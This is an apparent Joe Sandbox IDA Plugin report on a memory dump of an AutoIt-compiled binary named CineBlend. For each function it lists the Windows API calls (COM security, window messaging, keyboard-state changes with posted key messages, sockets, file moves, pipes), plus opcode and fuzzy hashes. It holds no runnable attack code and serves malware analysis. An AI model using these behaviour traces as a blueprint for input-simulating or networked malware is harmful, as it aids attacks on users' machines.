Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 35917562009906088bcc782e13396321e6bd91f449302e7a9f886dd2c7d65861
Instruction ID: 9ec366c063e2173d636504901d8792fd8f39e81e58f161e275de40e7d48480fb
Opcode Fuzzy Hash: 35917562009906088bcc782e13396321e6bd91f449302e7a9f886dd2c7d65861
Instruction Fuzzy Hash: 7F914975A083019FC714EF24C490A6AB7E5FF89714F1489ADF8899B351DB31EE06CB92

Function 00BC560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00BA08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?,?,00BA0C4E), ref: 00BA091B
Part of subcall function 00BA08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0936
Part of subcall function 00BA08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0944
Part of subcall function 00BA08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?), ref: 00BA0954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00BC56AE
_wcslen.LIBCMT ref: 00BC57B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00BC582C
CoTaskMemFree.OLE32(?), ref: 00BC5837

Strings

NULL Pointer assignment, xrefs: 00BC5880, 00BC58AF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 36a08411e4abf71d39e992187589007e49c1a7bcc17f3cdac91479408347a807
Instruction ID: 4366ba8345b109b5cf0aa12ab3990d20c48ff8acf8e27a5aa2e51eebb57379d0
Opcode Fuzzy Hash: 36a08411e4abf71d39e992187589007e49c1a7bcc17f3cdac91479408347a807
Instruction Fuzzy Hash: A491F671D00619AFDF24DFA4D881EEEB7F9AF08304F1045AAE915A7251EB70AA44DF60

Function 00BD2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00BD2C1F
GetMenuItemCount.USER32(00000000), ref: 00BD2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BD2C79
_wcslen.LIBCMT ref: 00BD2CAF
GetMenuItemID.USER32(?,?), ref: 00BD2CE9
GetSubMenu.USER32(?,?), ref: 00BD2CF7

Part of subcall function 00BA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA43AD
Part of subcall function 00BA4393: GetCurrentThreadId.KERNEL32 ref: 00BA43B4
Part of subcall function 00BA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BA2F00), ref: 00BA43BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BD2D7F

Part of subcall function 00BAF292: Sleep.KERNEL32 ref: 00BAF30A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: ac75178f1aed84738adb3b5d6053c189599afde99e40886f56a55c3e37f94410
Instruction ID: 90c2b9bc2ee3acd92e8ea169a9bf712598eb7f3085a1ff1ed19c86b1d5d9e29b
Opcode Fuzzy Hash: ac75178f1aed84738adb3b5d6053c189599afde99e40886f56a55c3e37f94410
Instruction Fuzzy Hash: 37718375E00205AFCB10DF64C885AAEB7F5EF58310F1484AAE816EB351EB34EE41CB90

Function 00BD88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00BD8992
IsWindowEnabled.USER32(00000000), ref: 00BD899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00BD8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00BD8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00BD8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00BD8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BD8B1E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 0f85524dca226c75a9def9824ecec3f467c8e4786d4a8ffad3732b1605b39340
Instruction ID: f56a6cfcdbfc2eda1af37e83d5cbbba7e1422eb34d5be1808606db338d561be2
Opcode Fuzzy Hash: 0f85524dca226c75a9def9824ecec3f467c8e4786d4a8ffad3732b1605b39340
Instruction Fuzzy Hash: AB719C74604209AFEB219F54C894FBAFBF9EF09301F1414DBE885673A1EB31A981DB51

Function 00BAB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BAB8C0
GetKeyboardState.USER32(?), ref: 00BAB8D5
SetKeyboardState.USER32(?), ref: 00BAB936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00BAB964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00BAB983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00BAB9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BAB9E7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e2610e0c5b1f1d8abeb7040f5d3947c2e70a763de0897aa287e43b9a80b0564a
Instruction ID: 8d4279e728317e5f29b04de1f43a6dd3b94c8932ce2992623c60beeb78edf7f6
Opcode Fuzzy Hash: e2610e0c5b1f1d8abeb7040f5d3947c2e70a763de0897aa287e43b9a80b0564a
Instruction Fuzzy Hash: 3C51AEA050C6D53EFB3642288855FBABEE99B07704F0884C9E1E5468D3D7A8AD94D760

Function 00BAB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00BAB6E0
GetKeyboardState.USER32(?), ref: 00BAB6F5
SetKeyboardState.USER32(?), ref: 00BAB756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BAB782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BAB79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BAB7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BAB7FF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 24275103ef4df82ef3044b149792bb5e9a358944cba943716c79b86a57f09b8a
Instruction ID: d94a82a6922aaf9c9f6fd3a6b69d17218bc2a6e48187627f563652c6f724358c
Opcode Fuzzy Hash: 24275103ef4df82ef3044b149792bb5e9a358944cba943716c79b86a57f09b8a
Instruction Fuzzy Hash: 0E51D1A090C6D53DFB3682288C55F76BEE9AB47704F0884C9E0E54A8D3D3D4EC94E760

Function 00B757A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B75F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B757E3
__fassign.LIBCMT ref: 00B7585E
__fassign.LIBCMT ref: 00B75879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B7589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00B75F16,00000000,?,?,?,?,?,?,?,?,?,00B75F16,?), ref: 00B758BE
WriteFile.KERNEL32(?,?,00000001,00B75F16,00000000,?,?,?,?,?,?,?,?,?,00B75F16,?), ref: 00B758F7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 74b54ac76e3decb4ab1322e4206fc59686ebef343f3ec94b29d138c1fbf1ee8f
Instruction ID: d04c0647789a19c5c9cc01401ece03ea48ec2034054ebf01d220b37cf5ab1818
Opcode Fuzzy Hash: 74b54ac76e3decb4ab1322e4206fc59686ebef343f3ec94b29d138c1fbf1ee8f
Instruction Fuzzy Hash: D451B671900649DFDB20CFA8D885BEEBBF8FF09310F14815AE969E7291D770A941CB61

Function 00B63090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B630BB
___except_validate_context_record.LIBVCRUNTIME ref: 00B630C3
_ValidateLocalCookies.LIBCMT ref: 00B63151
__IsNonwritableInCurrentImage.LIBCMT ref: 00B6317C
_ValidateLocalCookies.LIBCMT ref: 00B631D1

Strings

csm, xrefs: 00B63166

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 8e801ed08a85fd4c6d8ac3aa8adc8e9955af7a3a27ba9a927c6cdabac466a8e5
Instruction ID: 432e0c2f0e5d6eb34d9f7c5a2a51176de29c27950d86c361cbd4674c1f8f3566
Opcode Fuzzy Hash: 8e801ed08a85fd4c6d8ac3aa8adc8e9955af7a3a27ba9a927c6cdabac466a8e5
Instruction Fuzzy Hash: A4419374A002089BCF10DF68C885A9EBBF5EF45B24F1481D5E8156B392D739DB45CB91

Function 00BC1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BC3AD7
Part of subcall function 00BC3AAB: _wcslen.LIBCMT ref: 00BC3AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BC1B6F
WSAGetLastError.WSOCK32 ref: 00BC1B7E
WSAGetLastError.WSOCK32 ref: 00BC1C26
closesocket.WSOCK32(00000000), ref: 00BC1C56

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 6ca952493da2e13671fed5fa3241ef5ec4e962279cda4cb4f71624816c43bd70
Instruction ID: 4ded29f227fd79da032e816b010585036d9d0ccaa19f32bcc43476edea0bb96e
Opcode Fuzzy Hash: 6ca952493da2e13671fed5fa3241ef5ec4e962279cda4cb4f71624816c43bd70
Instruction Fuzzy Hash: 2B41B231600114AFDB109F28C885FAABBE9EF46324F14849DF855AB292DB71ED41CBE1

Function 00BAD7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BAD7CD,?), ref: 00BAE714

Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BAD7CD,?), ref: 00BAE72D

lstrcmpiW.KERNEL32(?,?), ref: 00BAD7F0
MoveFileW.KERNEL32(?,?), ref: 00BAD82A
_wcslen.LIBCMT ref: 00BAD8B0
_wcslen.LIBCMT ref: 00BAD8C6
SHFileOperationW.SHELL32(?), ref: 00BAD90C

Strings

\*.*, xrefs: 00BAD89E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: ec481cd770174bcb6bec11bfb2cdaf1db3c91624fc5a1838a4a22e74e01c27f1
Instruction ID: f6bfbdb563d06f5924f1161e00c758984ff80d0dfa792bf1adce475a454f3af5
Opcode Fuzzy Hash: ec481cd770174bcb6bec11bfb2cdaf1db3c91624fc5a1838a4a22e74e01c27f1
Instruction Fuzzy Hash: 8D4146719092189EDF12EFA4D985BDE77F8EF19340F1004E6A546EB141EB39E788CB50

Function 00BD3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00BD38B8
GetWindowLongW.USER32(?,000000F0), ref: 00BD38EB
GetWindowLongW.USER32(?,000000F0), ref: 00BD3920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00BD3952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00BD397C
GetWindowLongW.USER32(?,000000F0), ref: 00BD398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD39A7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: fa8534c31b640cefcd72749a9b75322aa3aa65a941a0063add1d1004d529c2ea
Instruction ID: d861d5b86aa0059a76a989c1d11464ef2b527c2de68647b77d0dfcfc7968df4e
Opcode Fuzzy Hash: fa8534c31b640cefcd72749a9b75322aa3aa65a941a0063add1d1004d529c2ea
Instruction Fuzzy Hash: 73313634705251AFDB218F48DC94F68B7E1FB8AB10F1441A6F5418B2B2DB75AD44DB42

Function 00BA808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA80D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA80F6
SysAllocString.OLEAUT32(00000000), ref: 00BA80F9
SysAllocString.OLEAUT32(?), ref: 00BA8117
SysFreeString.OLEAUT32(?), ref: 00BA8120
StringFromGUID2.OLE32(?,?,00000028), ref: 00BA8145
SysAllocString.OLEAUT32(?), ref: 00BA8153

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 58f21caf74f244159add349869dc8a9a9d3fba5e58c6602201399677654e2b38
Instruction ID: 76be82bd9e179965f63b7acf948eb0e8fa8b250b9530ff19d757d5fe788310d6
Opcode Fuzzy Hash: 58f21caf74f244159add349869dc8a9a9d3fba5e58c6602201399677654e2b38
Instruction Fuzzy Hash: A321A972605219BFDF10DFA8CC84CBB73ECEB0A3607048465F905EB290EA70DC468760

Function 00BA8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA81A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA81CF
SysAllocString.OLEAUT32(00000000), ref: 00BA81D2
SysAllocString.OLEAUT32 ref: 00BA81F3
SysFreeString.OLEAUT32 ref: 00BA81FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00BA8216
SysAllocString.OLEAUT32(?), ref: 00BA8224

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 526c1474e92b67893f4f750f965826a2ef47f3df7ac760685730a5abfb476578
Instruction ID: 3cbafa2d06bb31d50ed3f84edba9ea2b73c618982a149cb8cfb2c4ed308e6259
Opcode Fuzzy Hash: 526c1474e92b67893f4f750f965826a2ef47f3df7ac760685730a5abfb476578
Instruction Fuzzy Hash: 4F217471605204BF9B10AFA8DC89DBA77ECFB4A3607048165F905DB2A0EE74EC41CB64

Function 00BB0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00BB0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB0ED5

Strings

nul, xrefs: 00BB0F0E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 3fa107e5c1d80cd02326e60174df17cf8071ba85ad17ce110d3e5270e7a2f093
Instruction ID: 2f48cc49798fb1435f437e1fccd5c6d63b93a4df0ba9c311533af24c6ec4c1b8
Opcode Fuzzy Hash: 3fa107e5c1d80cd02326e60174df17cf8071ba85ad17ce110d3e5270e7a2f093
Instruction Fuzzy Hash: 8A212F70A10309ABDB20AF65D845AFB77E8EF55720F204A99FCA5971D0E7B0D940DB50

Function 00BB0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BB0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB0FA8

Strings

nul, xrefs: 00BB0FE0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: f92654fe374d94ef4dffb9b7d224a61705c00ab4c0886fb7fec7f6ed9e4da465
Instruction ID: 6a6915601598974e3fcbb0448e8c9f747e1c354ef8dcd4209867fc1c2fa26294
Opcode Fuzzy Hash: f92654fe374d94ef4dffb9b7d224a61705c00ab4c0886fb7fec7f6ed9e4da465
Instruction Fuzzy Hash: 33214C716043459BDB30AF688C54AFAB7E8FF55724F600A59F8E1E32D0EBB09990DB50

Function 00BD4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B47873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B478B1
Part of subcall function 00B47873: GetStockObject.GDI32(00000011), ref: 00B478C5
Part of subcall function 00B47873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B478CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BD4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BD4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BD4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BD4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BD4BE3

Strings

Msctls_Progress32, xrefs: 00BD4B81

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c8b95230c314fd271f4003b3814dcd2698fde80913359ceccb2431f3c57ba492
Instruction ID: 5cfbdc1a5f38564ab52719bf503efcc1bde650019c6b111d9fc725deb1cf0dfd
Opcode Fuzzy Hash: c8b95230c314fd271f4003b3814dcd2698fde80913359ceccb2431f3c57ba492
Instruction Fuzzy Hash: 921193B2150219BEEF118E65CC85EEBBFADEF08758F014112B658A6190DB72DC21DBA4

